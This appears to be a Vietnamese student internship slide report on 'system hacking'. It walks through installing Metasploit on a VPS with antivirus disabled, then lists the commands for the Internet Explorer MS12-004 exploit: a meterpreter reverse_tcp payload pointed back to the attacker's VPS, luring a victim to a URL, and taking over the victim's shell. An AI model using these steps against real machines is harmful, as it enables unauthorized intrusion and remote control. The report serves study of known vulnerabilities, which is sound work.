Embed Size (px)
Citation preview
Báo cáo thực tập Cuối kỳ
Đề tài: System Hacking
Sinh viên:Trần Văn VịnhNguyễn Minh
Tiến
Mục tiêu:Thực hiện tấn công máy Victeam thông qua máy
chủ ảo VPS.
Nội dung:- Cài đặt Metasploit Framework trên VPS.
- Khai thác lỗi Internet Explorer thông qua VPS (ms12_004).
- Khai thác lỗi Microsoft Word MS12_027 qua VPS.
- Demo lỗi.- Cảm nhận và kinh nghiệm rút ra sau kì thực tập.
I. Setup MSF trên VPSBước 1 : Truy cập vào VPS bằng Remote
Desktop Connection
Bước 2 : Download và cài đặt MSF trên VPS qua trang chủ: http://www.metasploit.com
I. Setup MSF trên VPS
Sau khi tải về ta chạy file setup đúng với HDH của VPS.Lưu ý : Tắt các chương trình diệt virus và firewall trước khi cài .
Kết quả khi hoàn thành cài đặt
I. Setup MSF trên VPS
II. Khai thác lỗi Internet Explorer ms12_004
Đầu tiên ta đăng nhập vào máy chủ ảo VPS và chạy MSF
Gõ search ms12_024 để tìm mã lỗi
II. Khai thác lỗi Internet Explorer ms12_004
Use exploit/windows/brower/ms12_004_midi
II. Khai thác lỗi Internet Explorer ms12_004
Set payload windows/meterpreter/reverse_tcp
II. Khai thác lỗi Internet Explorer ms12_004
Set srvhost và lhost = “ ip của máy tấn công “.
(ở đây là ip của máy chủ ảo VPS)
II. Khai thác lỗi Internet Explorer ms12_004
Set uripath =” đường dẫn “ .
II. Khai thác lỗi Internet Explorer ms12_004
Và exploit để khởi động server
II. Khai thác lỗi Internet Explorer ms12_004
Lấy máy nạn nhân truy cập vào đường dẫn mà ta đã tạo ra
II. Khai thác lỗi Internet Explorer ms12_004
Sau một khoảng thời gian => Xâm nhập thành công máy nạn nhân .
II. Khai thác lỗi Internet Explorer ms12_004
Dùng lệnh sessions –I “ id của session muốn vào “ để thực hiện tấn công .
Lệnh sysinfo để xem thông tin máy và lệnh shell để điều khiển cmd của máy nạn nhân .
II. Khai thác lỗi Internet Explorer ms12_004
III. Khai thác lỗi Office word MS12_027
Demo chương trình:
https://www.youtube.com/watch?v=IH11i482w5o
IV. Cảm nhận và kinh nghiệm rút ra sau kì thực tập
Bổ ích và lý thú
Cảm nhận
Đem lại nhiều kinh
nghiệm
Môi trường làm việc
thân thiện
Thầy cô tận tình với SV
Kinh nghiệm rút ra:- Làm việc theo nhóm giúp hoàn thành công việc
hiệu quả và dễ dàng hơn.- Nâng cao được khả năng tìm hiểu, chọn lọc thông
tin cần thiết đối với đề tài của mình.- Nâng cao khả năng làm việc độc lập, biết
cách tư duy chín chắn để có thể tự khắc phục 1 số lỗi cần thiết.
IV. Cảm nhận và kinh nghiệm rút ra sau kì thực tập
Cám ơn thầy và các bạn đã lắng nghe
